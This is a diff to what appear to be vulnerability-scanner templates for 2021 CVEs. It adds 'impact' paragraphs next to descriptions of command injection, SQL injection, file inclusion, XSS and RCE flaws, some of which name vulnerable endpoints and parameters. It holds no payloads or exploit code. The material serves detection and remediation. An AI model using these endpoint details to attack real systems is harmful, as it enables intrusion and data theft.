@@ -5,6 +5,8 @@ info: author: Pratik Khalane severity: critical description: Tieline IP Audio Gateway 2.6.4.8 and below is affected by a vulnerability in the web administrative interface that could allow an unauthenticated user to access a sensitive part of the system with a high privileged account. + impact: | + An attacker can gain unauthorized access to the admin panel, potentially leading to unauthorized control and manipulation of the audio gateway. remediation: | Upgrade to a patched version of Tieline IP Audio Gateway that fixes the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-35380.yaml b/http/cves/2021/CVE-2021-35380.yaml index 549d2557dc..318923feaf 100644 --- a/http/cves/2021/CVE-2021-35380.yaml +++ b/http/cves/2021/CVE-2021-35380.yaml @@ -6,6 +6,8 @@ info: severity: high description: | TermTalk Server (TTServer) 3.24.0.2 is vulnerable to file inclusion which allows unauthenticated malicious user to gain access to the files on the remote system by providing the relative path of the file they want to retrieve. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, including configuration files, credentials, and other sensitive data. remediation: | Apply the latest patch or upgrade to a non-vulnerable version of TermTalk Server. reference: diff --git a/http/cves/2021/CVE-2021-35464.yaml b/http/cves/2021/CVE-2021-35464.yaml index 5f2ae560d6..b7476a24d4 100644 --- a/http/cves/2021/CVE-2021-35464.yaml +++ b/http/cves/2021/CVE-2021-35464.yaml 
@@ -9,6 +9,8 @@ info: The exploitation does not require authentication, and remote code execution can be triggered by sending a single crafted /ccversion/* request to the server. The vulnerability exists due to the usage of Sun ONE Application Framework (JATO) found in versions of Java 8 or earlier. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Upgrade ForgeRock OpenAM to version 7.0 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-35488.yaml b/http/cves/2021/CVE-2021-35488.yaml index aeaf059913..475d421635 100644 --- a/http/cves/2021/CVE-2021-35488.yaml +++ b/http/cves/2021/CVE-2021-35488.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Thruk 2.40-2 contains a cross-site scripting vulnerability via /thruk/#cgi-bin/status.cgi?style=combined&title={TITLE] in the host or title parameter. An attacker can inject arbitrary JavaScript into status.cgi, leading to a triggered payload when accessed by an authenticated user. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a patched version of Thruk or apply the vendor-supplied patch to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-35587.yaml b/http/cves/2021/CVE-2021-35587.yaml index 4d87bbf8cc..642f7f8630 100644 --- a/http/cves/2021/CVE-2021-35587.yaml +++ b/http/cves/2021/CVE-2021-35587.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | The Oracle Access Manager portion of Oracle Fusion Middleware (component: OpenSSO Agent) is vulnerable to remote code execution. Supported versions that are affected are 11.1.2.3.0, 12.2.1.3.0 and 12.2.1.4.0. This is an easily exploitable vulnerability that allows unauthenticated attackers with network access via HTTP to compromise Oracle Access Manager. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patches provided by Oracle to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-3577.yaml b/http/cves/2021/CVE-2021-3577.yaml index b84aad6b6b..dcac4ddb13 100644 --- a/http/cves/2021/CVE-2021-3577.yaml +++ b/http/cves/2021/CVE-2021-3577.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: high description: Motorola Baby Monitors contains multiple interface vulnerabilities could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the affected device, potentially leading to unauthorized access, data theft, or further compromise of the network. remediation: | Apply the latest firmware update provided by Motorola to mitigate the vulnerability and ensure the device is not accessible from untrusted networks. reference: diff --git a/http/cves/2021/CVE-2021-36260.yaml b/http/cves/2021/CVE-2021-36260.yaml index b73548088c..c843970fad 100644 --- a/http/cves/2021/CVE-2021-36260.yaml +++ b/http/cves/2021/CVE-2021-36260.yaml 
@@ -5,6 +5,8 @@ info: author: pdteam,gy741,johnk3r severity: critical description: Certain Hikvision products contain a command injection vulnerability in the web server due to the insufficient input validation. An attacker can exploit the vulnerability to launch a command injection attack by sending some messages with malicious commands. + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the affected device. remediation: | Apply the latest firmware update provided by Hikvision to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-36380.yaml b/http/cves/2021/CVE-2021-36380.yaml index 354a18df6c..3d6b1d5ada 100644 --- a/http/cves/2021/CVE-2021-36380.yaml +++ b/http/cves/2021/CVE-2021-36380.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: Sunhillo SureLine <8.7.0.1.1 is vulnerable to OS command injection. The /cgi/networkDiag.cgi script directly incorporated user-controllable parameters within a shell command, allowing an attacker to manipulate the resulting command by injecting valid OS command input. The following POST request injects a new command that instructs the server to establish a reverse TCP connection to another system, allowing the establishment of an interactive remote shell session. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system. remediation: | Upgrade to Sunhillo SureLine version 8.7.0.1.1 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-36450.yaml b/http/cves/2021/CVE-2021-36450.yaml index eaf8cd4164..b1c4bae660 100644 --- a/http/cves/2021/CVE-2021-36450.yaml +++ b/http/cves/2021/CVE-2021-36450.yaml 
@@ -5,6 +5,8 @@ info: author: atomiczsec severity: medium description: Verint Workforce Optimization 15.2.8.10048 contains a cross-site scripting vulnerability via the control/my_notifications NEWUINAV parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patch or upgrade to a non-vulnerable version of Verint Workforce Optimization. reference: diff --git a/http/cves/2021/CVE-2021-3654.yaml b/http/cves/2021/CVE-2021-3654.yaml index 87d84d78ad..60fb145970 100644 --- a/http/cves/2021/CVE-2021-3654.yaml +++ b/http/cves/2021/CVE-2021-3654.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: Nova noVNC contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to potential phishing attacks. remediation: | Apply the latest security patches or updates provided by the vendor to fix the open redirect vulnerability in the Nova noVNC application. reference: diff --git a/http/cves/2021/CVE-2021-36580.yaml b/http/cves/2021/CVE-2021-36580.yaml index ba8f7f725e..c0893da1f5 100644 --- a/http/cves/2021/CVE-2021-36580.yaml +++ b/http/cves/2021/CVE-2021-36580.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | IceWarp Mail Server contains an open redirect via the referer parameter. This can lead to phishing attacks or other unintended redirects. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the theft of sensitive information. remediation: | Apply the latest security patches or updates provided by IceWarp to fix the open redirect vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-36748.yaml b/http/cves/2021/CVE-2021-36748.yaml index dffb3a8186..6478a9e036 100644 --- a/http/cves/2021/CVE-2021-36748.yaml +++ b/http/cves/2021/CVE-2021-36748.yaml @@ -5,6 +5,8 @@ info: author: whoever severity: high description: PrestaHome Blog for PrestaShop prior to version 1.7.8 is vulnerable to a SQL injection (blind) via the sb_category parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage. remediation: | Upgrade to PrestaShop version 1.7.8 or later, or apply the provided patch to fix the SQL Injection vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-36749.yaml b/http/cves/2021/CVE-2021-36749.yaml index bc0b41941c..0adef3f0e1 100644 --- a/http/cves/2021/CVE-2021-36749.yaml +++ b/http/cves/2021/CVE-2021-36749.yaml 
@@ -5,6 +5,8 @@ info: author: _0xf4n9x_ severity: medium description: Apache Druid ingestion system is vulnerable to local file inclusion. The InputSource is used for reading data from a certain data source. However, the HTTP InputSource allows authenticated users to read data from other sources than intended, such as the local file system, with the privileges of the Druid server process. This is not an elevation of privilege when users access Druid directly, since Druid also provides the Local InputSource, which allows the same level of access. But it is problematic when users interact with Druid indirectly through an application that allows users to specify the HTTP InputSource, but not the Local InputSource. In this case, users could bypass the application-level restriction by passing a file URL to the HTTP InputSource. This issue was previously mentioned as being fixed in 0.21.0 as per CVE-2021-26920 but was not fixed in 0.21.0 or 0.21.1. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the affected system. remediation: | Apply the latest security patches or updates provided by Apache Druid to fix the LFI vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-37216.yaml b/http/cves/2021/CVE-2021-37216.yaml index fbbc7a3e47..d613bdf622 100644 --- a/http/cves/2021/CVE-2021-37216.yaml +++ b/http/cves/2021/CVE-2021-37216.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | QSAN Storage Manager before 3.3.3 contains a reflected cross-site scripting vulnerability. Header page parameters do not filter special characters. Remote attackers can inject JavaScript to access and modify specific data. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade QSAN Storage Manager to version 3.3.3 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-37304.yaml b/http/cves/2021/CVE-2021-37304.yaml index 575a89fa1d..7d5f180fbf 100644 --- a/http/cves/2021/CVE-2021-37304.yaml +++ b/http/cves/2021/CVE-2021-37304.yaml @@ -6,6 +6,8 @@ info: severity: high description: | An Insecure Permissions issue in jeecg-boot 2.4.5 allows unauthenticated remote attackers to gain escalated privilege and view sensitive information via the httptrace interface. + impact: | + An attacker can exploit this vulnerability to gain sensitive information from the application. remediation: | Upgrade Jeecg Boot to a version higher than 2.4.5 to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-37305.yaml b/http/cves/2021/CVE-2021-37305.yaml index c70026920c..cd9940b28b 100644 --- a/http/cves/2021/CVE-2021-37305.yaml +++ b/http/cves/2021/CVE-2021-37305.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Jeecg Boot <= 2.4.5 API interface has unauthorized access and leaks sensitive information such as email,phone and Enumerate usernames that exist in the system. + impact: | + An attacker can exploit this vulnerability to gain access to sensitive information, potentially leading to unauthorized access or data leakage. remediation: | Upgrade Jeecg Boot to version 2.4.6 or later to fix the vulnerability. reference: 
diff --git a/http/cves/2021/CVE-2021-37416.yaml b/http/cves/2021/CVE-2021-37416.yaml index 2a17b674bb..b771366594 100644 --- a/http/cves/2021/CVE-2021-37416.yaml +++ b/http/cves/2021/CVE-2021-37416.yaml @@ -5,6 +5,8 @@ info: author: edoardottt severity: medium description: Zoho ManageEngine ADSelfService Plus 6103 and prior contains a reflected cross-site scripting vulnerability on the loadframe page. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected user's browser. remediation: | Upgrade to a patched version of Zoho ManageEngine ADSelfService Plus (version >6103) to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-37538.yaml b/http/cves/2021/CVE-2021-37538.yaml index d12f633a94..1420e956c1 100644 --- a/http/cves/2021/CVE-2021-37538.yaml +++ b/http/cves/2021/CVE-2021-37538.yaml @@ -1,10 +1,12 @@ id: CVE-2021-37538 info: - name: PrestaShop SmartBlog <4.0.6- SQL Injection + name: PrestaShop SmartBlog <4.0.6 - SQL Injection author: whoever severity: critical description: PrestaShop SmartBlog by SmartDataSoft < 4.0.6 is vulnerable to a SQL injection vulnerability in the blog archive functionality. + impact: | + An attacker can gain unauthorized access to the database, extract sensitive information, modify data, or perform other malicious activities. remediation: | Upgrade PrestaShop SmartBlog to version 4.0.6 or later to mitigate the SQL Injection vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-37573.yaml b/http/cves/2021/CVE-2021-37573.yaml index 3c22f59263..0fcf24ef31 100644 --- a/http/cves/2021/CVE-2021-37573.yaml +++ b/http/cves/2021/CVE-2021-37573.yaml 
@@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: A reflected cross-site scripting vulnerability in the web server TTiny Java Web Server and Servlet Container (TJWS) <=1.115 allows an adversary to inject malicious code on the server's "404 Page not Found" error page. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Apply the latest security patches or updates provided by the vendor to fix this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-37580.yaml b/http/cves/2021/CVE-2021-37580.yaml index 50aa7eadd9..7aab7ff313 100644 --- a/http/cves/2021/CVE-2021-37580.yaml +++ b/http/cves/2021/CVE-2021-37580.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: critical description: Apache ShenYu 2.3.0 and 2.4.0 allow Admin access without proper authentication. The incorrect use of JWT in ShenyuAdminBootstrap allows an attacker to bypass authentication. + impact: | + This vulnerability can lead to unauthorized access to sensitive information, modification of data, and potential compromise of the entire Apache ShenYu system. remediation: | Apply the patch or upgrade to the latest version of Apache ShenYu to fix the authentication bypass vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-37589.yaml b/http/cves/2021/CVE-2021-37589.yaml index a18f93051c..db73faee5b 100644 --- a/http/cves/2021/CVE-2021-37589.yaml +++ b/http/cves/2021/CVE-2021-37589.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | Virtua Cobranca before 12R allows blind SQL injection on the login page. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, and potential compromise of the underlying system. remediation: | Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in Virtua Software Cobranca <12R. reference: diff --git a/http/cves/2021/CVE-2021-37704.yaml b/http/cves/2021/CVE-2021-37704.yaml index 329912cb97..2356174b78 100644 --- a/http/cves/2021/CVE-2021-37704.yaml +++ b/http/cves/2021/CVE-2021-37704.yaml @@ -5,6 +5,8 @@ info: author: whoever severity: medium description: phpinfo() is susceptible to resource exposure in unprotected composer vendor folders via phpfastcache/phpfastcache. + impact: | + An attacker can gain access to sensitive information, such as server configuration details, PHP version, and installed extensions. remediation: | Remove or restrict access to the phpinfo.php file in the phpfastcache library. reference: diff --git a/http/cves/2021/CVE-2021-37833.yaml b/http/cves/2021/CVE-2021-37833.yaml index f06d1a975f..9e815bb084 100644 --- a/http/cves/2021/CVE-2021-37833.yaml +++ b/http/cves/2021/CVE-2021-37833.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Hotel Druid 3.0.2 contains a cross-site scripting vulnerability in multiple pages which allows for arbitrary execution of JavaScript commands. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | To remediate this issue, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts. reference: 
diff --git a/http/cves/2021/CVE-2021-38314.yaml b/http/cves/2021/CVE-2021-38314.yaml index e23fa87b43..9814908396 100644 --- a/http/cves/2021/CVE-2021-38314.yaml +++ b/http/cves/2021/CVE-2021-38314.yaml @@ -5,6 +5,8 @@ info: author: meme-lord severity: medium description: WordPress Redux Framework plugin through 4.2.11 is susceptible to information disclosure. The plugin registers several unique AJAX actions available to unauthenticated users in the includes function in redux-core/class-redux-core.php. These are predictable, given that they are based on an md5 hash of the site URL with a known salt value of -redux and an md5 hash of the previous hash with a known salt value of -support. An attacker can potentially employ these AJAX actions to retrieve a list of active plugins and their versions, the site's PHP version, and an unsalted md5 hash of the site's AUTH_KEY concatenated with the SECURE_AUTH_KEY. + impact: | + An attacker can exploit this vulnerability to gain sensitive information from the target system. remediation: | Update WordPress Redux Framework to version 4.2.12 or later. reference: diff --git a/http/cves/2021/CVE-2021-38540.yaml b/http/cves/2021/CVE-2021-38540.yaml index 2482761119..18e14f9680 100644 --- a/http/cves/2021/CVE-2021-38540.yaml +++ b/http/cves/2021/CVE-2021-38540.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: critical description: Apache Airflow Airflow >=2.0.0 and <2.1.3 does not protect the variable import endpoint which allows unauthenticated users to hit that endpoint to add/modify Airflow variables used in DAGs, potentially resulting in a denial of service, information disclosure or remote code execution. + impact: | + An attacker can exploit this vulnerability to import malicious variables, potentially gaining unauthorized access to sensitive data. remediation: Upgrade to Apache Airflow 2.1.3 or higher. reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-38540 
diff --git a/http/cves/2021/CVE-2021-38647.yaml b/http/cves/2021/CVE-2021-38647.yaml index 3bd11c8ddd..dda3b34df5 100644 --- a/http/cves/2021/CVE-2021-38647.yaml +++ b/http/cves/2021/CVE-2021-38647.yaml @@ -5,6 +5,8 @@ info: author: daffainfo,xstp severity: critical description: Microsoft Open Management Infrastructure is susceptible to remote code execution (OMIGOD). + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code with SYSTEM privileges. remediation: Updates for this vulnerability were published on GitHub on August 11, 2021. reference: - https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure diff --git a/http/cves/2021/CVE-2021-38702.yaml b/http/cves/2021/CVE-2021-38702.yaml index f031b2ed1b..41b10aa1df 100644 --- a/http/cves/2021/CVE-2021-38702.yaml +++ b/http/cves/2021/CVE-2021-38702.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: Cyberoam NetGenie C0101B1-20141120-NG11VO devices through 2021-08-14 are susceptible to reflected cross-site scripting via the 'u' parameter of ft.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or firmware updates provided by the vendor to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-38704.yaml b/http/cves/2021/CVE-2021-38704.yaml index 04dd3a74de..5fdf82075d 100644 --- a/http/cves/2021/CVE-2021-38704.yaml +++ b/http/cves/2021/CVE-2021-38704.yaml 
@@ -5,6 +5,8 @@ info: author: alph4byt3 severity: medium description: ClinicCases 7.3.3 is susceptible to multiple reflected cross-site scripting vulnerabilities that could allow unauthenticated attackers to introduce arbitrary JavaScript by crafting a malicious URL. This can result in account takeover via session token theft. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | To mitigate this vulnerability, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts. reference: diff --git a/http/cves/2021/CVE-2021-38751.yaml b/http/cves/2021/CVE-2021-38751.yaml index b77fe3d593..4827ebf7ee 100644 --- a/http/cves/2021/CVE-2021-38751.yaml +++ b/http/cves/2021/CVE-2021-38751.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: medium description: An HTTP Host header attack exists in ExponentCMS 2.6 and below in /exponent_constants.php. A modified HTTP header can change links on the webpage to an arbitrary value,leading to a possible attack vector for MITM. + impact: | + An attacker can manipulate the Host header to perform various attacks, including phishing, session hijacking, and cache poisoning. remediation: | Upgrade ExponentCMS to a version higher than 2.6 or apply the provided patch to fix the Host Header Injection vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-39144.yaml b/http/cves/2021/CVE-2021-39144.yaml index 9a187a5834..65387a2170 100644 --- a/http/cves/2021/CVE-2021-39144.yaml +++ b/http/cves/2021/CVE-2021-39144.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | XStream 1.4.18 is susceptible to remote code execution. An attacker can execute commands of the host by manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. Setups which followed XStream's security recommendations with an allow-list are not impacted. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system. remediation: | Upgrade XStream to a version that is not affected by CVE-2021-39144. reference: diff --git a/http/cves/2021/CVE-2021-39146.yaml b/http/cves/2021/CVE-2021-39146.yaml index 7f36db4789..9795c92e13 100644 --- a/http/cves/2021/CVE-2021-39146.yaml +++ b/http/cves/2021/CVE-2021-39146.yaml @@ -6,6 +6,8 @@ info: severity: high description: | XStream 1.4.18 is susceptible to remote code execution. An attacker can execute commands of the host by manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. Setups which followed XStream's security recommendations with an allow-list are not impacted. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Upgrade XStream to a version that is not affected by CVE-2021-39146. reference: diff --git a/http/cves/2021/CVE-2021-39152.yaml b/http/cves/2021/CVE-2021-39152.yaml index 62ebb3be5f..1db17e372f 100644 --- a/http/cves/2021/CVE-2021-39152.yaml +++ b/http/cves/2021/CVE-2021-39152.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | XStream before 1.4.18 is susceptible to server-side request forgery. An attacker can request data from internal resources that are not publicly available by manipulating the processed input stream with a Java runtime version 14 to 8. This makes it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could result in unauthorized access to sensitive internal resources or services. remediation: | Upgrade XStream to version 1.4.18 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-39165.yaml b/http/cves/2021/CVE-2021-39165.yaml index 700c3b1594..baec9c2d3e 100644 --- a/http/cves/2021/CVE-2021-39165.yaml +++ b/http/cves/2021/CVE-2021-39165.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Cachet is an open source status page. With Cachet prior to and including 2.3.18, there is a SQL injection which is in the `SearchableTrait#scopeSearch()`. Attackers without authentication can utilize this vulnerability to exfiltrate sensitive data from the database such as administrator's password and session. The original repository of Cachet is not active, the stable version 2.3.18 and it's developing 2.4 branch is affected. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade Cachet to a version higher than 2.3.18 or apply the necessary patches provided by the vendor. reference: diff --git a/http/cves/2021/CVE-2021-39211.yaml b/http/cves/2021/CVE-2021-39211.yaml index 445adefd92..c68bd24873 100644 --- a/http/cves/2021/CVE-2021-39211.yaml +++ b/http/cves/2021/CVE-2021-39211.yaml 
@@ -5,6 +5,8 @@ info: author: dogasantos,noraj severity: medium description: GLPI 9.2 and prior to 9.5.6 is susceptible to information disclosure via the telemetry endpoint, which discloses GLPI and server information. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + Information disclosure vulnerability in GLPI versions 9.2 to <9.5.6 allows an attacker to access sensitive information. remediation: This issue is fixed in version 9.5.6. As a workaround, remove the file ajax/telemetry.php, which is not needed for usual GLPI functions. reference: - https://github.com/glpi-project/glpi/security/advisories/GHSA-xx66-v3g5-w825 diff --git a/http/cves/2021/CVE-2021-39226.yaml b/http/cves/2021/CVE-2021-39226.yaml index 815739640c..de2575db2e 100644 --- a/http/cves/2021/CVE-2021-39226.yaml +++ b/http/cves/2021/CVE-2021-39226.yaml 
@@ -5,6 +5,8 @@ info: author: Evan Rubinstein severity: high description: Grafana instances up to 7.5.11 and 8.1.5 allow remote unauthenticated users to view the snapshot associated with the lowest database key by accessing the literal paths /api/snapshot/:key or /dashboard/snapshot/:key. If the snapshot is in public mode, unauthenticated users can delete snapshots by accessing the endpoint /api/snapshots-delete/:deleteKey. Authenticated users can also delete snapshots by accessing the endpoints /api/snapshots-delete/:deleteKey, or sending a delete request to /api/snapshot/:key, regardless of whether or not the snapshot is set to public mode (disabled by default). + impact: | + An attacker can bypass authentication and gain unauthorized access to Grafana Snapshot feature. remediation: 'This issue has been resolved in versions 8.1.6 and 7.5.11. If you cannot upgrade you can block access to the literal paths: /api/snapshots/:key, /api/snapshots-delete/:deleteKey, /dashboard/snapshot/:key, and /api/snapshots/:key. They have no normal function and can be disabled without side effects.' reference: - https://github.com/advisories/GHSA-69j6-29vr-p3j9 diff --git a/http/cves/2021/CVE-2021-39316.yaml b/http/cves/2021/CVE-2021-39316.yaml index 0be15b661e..b52ab5bba4 100644 --- a/http/cves/2021/CVE-2021-39316.yaml +++ b/http/cves/2021/CVE-2021-39316.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: WordPress Zoomsounds plugin 6.45 and earlier allows arbitrary files, including sensitive configuration files such as wp-config.php, to be downloaded via the `dzsap_download` action using directory traversal in the `link` parameter. + impact: | + Local File Inclusion vulnerability in WordPress DZS Zoomsounds plugin allows an attacker to include arbitrary files from the server, potentially leading to remote code execution or sensitive information disclosure. remediation: | Update to the latest version of WordPress DZS Zoomsounds plugin (>=6.51) to fix the Local File Inclusion vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-39320.yaml b/http/cves/2021/CVE-2021-39320.yaml index be9d53ee75..a6017a934c 100644 --- a/http/cves/2021/CVE-2021-39320.yaml +++ b/http/cves/2021/CVE-2021-39320.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Under Construction plugin before 1.19 contains a cross-site scripting vulnerability. The plugin echoes out the raw value of `$GLOBALS['PHP_SELF']` in the ucOptions.php file on certain configurations, including Apache+modPHP. + impact: | + The vulnerability allows an attacker to inject malicious scripts into the website, potentially leading to unauthorized access, data theft, or defacement. remediation: | Update to the latest version of the WordPress Under Construction plugin (1.19 or higher) to fix the XSS vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-39322.yaml b/http/cves/2021/CVE-2021-39322.yaml index 08cf4662d7..112a3db674 100644 --- a/http/cves/2021/CVE-2021-39322.yaml +++ b/http/cves/2021/CVE-2021-39322.yaml 
@@ -5,6 +5,8 @@ info: author: dhiyaneshDK severity: medium description: The Easy Social Icons plugin <= 3.0.8 for WordPress echoes out the raw value of `$_SERVER['PHP_SELF']` in its main file. On certain configurations including Apache+modPHP this makes it possible to use it to perform a reflected cross-site scripting attack by injecting malicious code in the request path. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement. remediation: | Update to the latest version of the WordPress Easy Social Icons Plugin (3.0.9) or apply the vendor-provided patch to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-39327.yaml b/http/cves/2021/CVE-2021-39327.yaml index 4fdbb40d7d..a81c6f2d84 100644 --- a/http/cves/2021/CVE-2021-39327.yaml +++ b/http/cves/2021/CVE-2021-39327.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: The BulletProof Security WordPress plugin is vulnerable to sensitive information disclosure due to a file path disclosure in the publicly accessible ~/db_backup_log.txt file which grants attackers the full path of the site, in addition to the path of database backup files. This affects versions up to, and including, 5.1. + impact: | + An attacker can gain sensitive information from the target system. remediation: | Update to the latest version of WordPress BulletProof Security. reference: diff --git a/http/cves/2021/CVE-2021-39350.yaml b/http/cves/2021/CVE-2021-39350.yaml index 99b8732598..9307876103 100644 --- a/http/cves/2021/CVE-2021-39350.yaml +++ b/http/cves/2021/CVE-2021-39350.yaml 
@@ -5,6 +5,8 @@ info: author: gy741 severity: medium description: The FV Flowplayer Video Player WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the player_id parameter found in the ~/view/stats.php file which allows attackers to inject arbitrary web scripts in versions 7.5.0.727 - 7.5.2.727. + impact: | + Successful exploitation of this vulnerability could allow an authenticated attacker to execute arbitrary JavaScript code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the FV Flowplayer Video Player WordPress plugin to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-39433.yaml b/http/cves/2021/CVE-2021-39433.yaml index ec783ac4b6..651d3efc70 100644 --- a/http/cves/2021/CVE-2021-39433.yaml +++ b/http/cves/2021/CVE-2021-39433.yaml @@ -5,6 +5,8 @@ info: author: Veshraj severity: high description: A local file inclusion vulnerability exists in version BIQS IT Biqs-drive v1.83 and below when sending a specific payload as the file parameter to download/index.php. This allows the attacker to read arbitrary files from the server with the permissions of the configured web-user. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system. remediation: | Upgrade to the latest version of BIQS IT Biqs-drive (v1.84 or higher) which includes a fix for the Local File Inclusion vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-39501.yaml b/http/cves/2021/CVE-2021-39501.yaml index 1dd9ada392..99c649b191 100644 --- a/http/cves/2021/CVE-2021-39501.yaml +++ b/http/cves/2021/CVE-2021-39501.yaml 
@@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: EyouCMS 1.5.4 is vulnerable to an Open Redirect vulnerability. An attacker can redirect a user to a malicious url via the Logout function. + impact: | + Successful exploitation of this vulnerability could lead to phishing attacks, credential theft,. remediation: | Apply the latest security patch or upgrade to a newer version of EyouCMS to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-40149.yaml b/http/cves/2021/CVE-2021-40149.yaml index f13c725cf6..6bc8d4fb7d 100644 --- a/http/cves/2021/CVE-2021-40149.yaml +++ b/http/cves/2021/CVE-2021-40149.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Reolink E1 Zoom Camera versions 3.0.0.716 and below suffer from a private key (RSA) disclosure vulnerability. + impact: | + An attacker can obtain the private key, potentially leading to unauthorized access and compromise of the camera. remediation: | Upgrade the Reolink E1 Zoom Camera to a version higher than 3.0.0.716 to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-40150.yaml b/http/cves/2021/CVE-2021-40150.yaml index 2d0ab21104..2038a56320 100644 --- a/http/cves/2021/CVE-2021-40150.yaml +++ b/http/cves/2021/CVE-2021-40150.yaml 
